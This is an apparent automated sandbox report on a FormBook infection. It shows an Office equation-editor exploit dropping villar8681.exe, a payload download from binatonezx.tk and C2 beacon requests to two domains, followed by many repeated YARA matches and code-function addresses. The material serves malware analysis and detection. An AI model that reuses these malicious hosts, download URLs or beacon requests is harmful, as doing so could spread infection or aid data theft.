Source: explorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.442147591.0000000003DF8000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.451281002.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.506586274.00000000045CF000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
Source: raserver.exe, 00000007.00000002.680534004.0000000002B5F000.00000004.00020000.sdmp | String found in binary or memory: https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67
Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3AC3AA43-F534-4DDB-AF6A-E52603844969}.tmp
Source: unknown | DNS traffic detected: queries for: binatonezx.tk
Source: global traffic | HTTP traffic detected: GET /villarzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: binatonezx.tk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj HTTP/1.1 | Host: www.filecrev.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj HTTP/1.1 | Host: www.charlotte-s-creations.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\villar8681.exe
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D0190
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D6AF8
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D67C0
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D8887
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D0561
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D8638
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D8648
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D67AF
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_010494B4
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E840
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E066
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D950
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E1DE
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041DAF8
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E292
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041EC35
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00402D87
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D596
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00409E50
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00409E54
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041DE95
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087E0C6
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008AD005
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00883040
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0089905A
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008FD06D
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090D13F
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087E2E9
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00921238
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_009263BF
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087F3CF
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008A63DB
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00882305
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00887353
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008CA37B
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00891489
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008B5485
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090443E
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008BD47D
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_009235DA
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_009005E3
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0089C5F0
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088351F
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008C6540
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00884680
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088E6C1
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00922622
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008CA634
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090579A
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088C7BC
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008B57C3
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008FF8C4
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0091F8EE
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088C85C
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008A286D
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0092098E
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008829B2
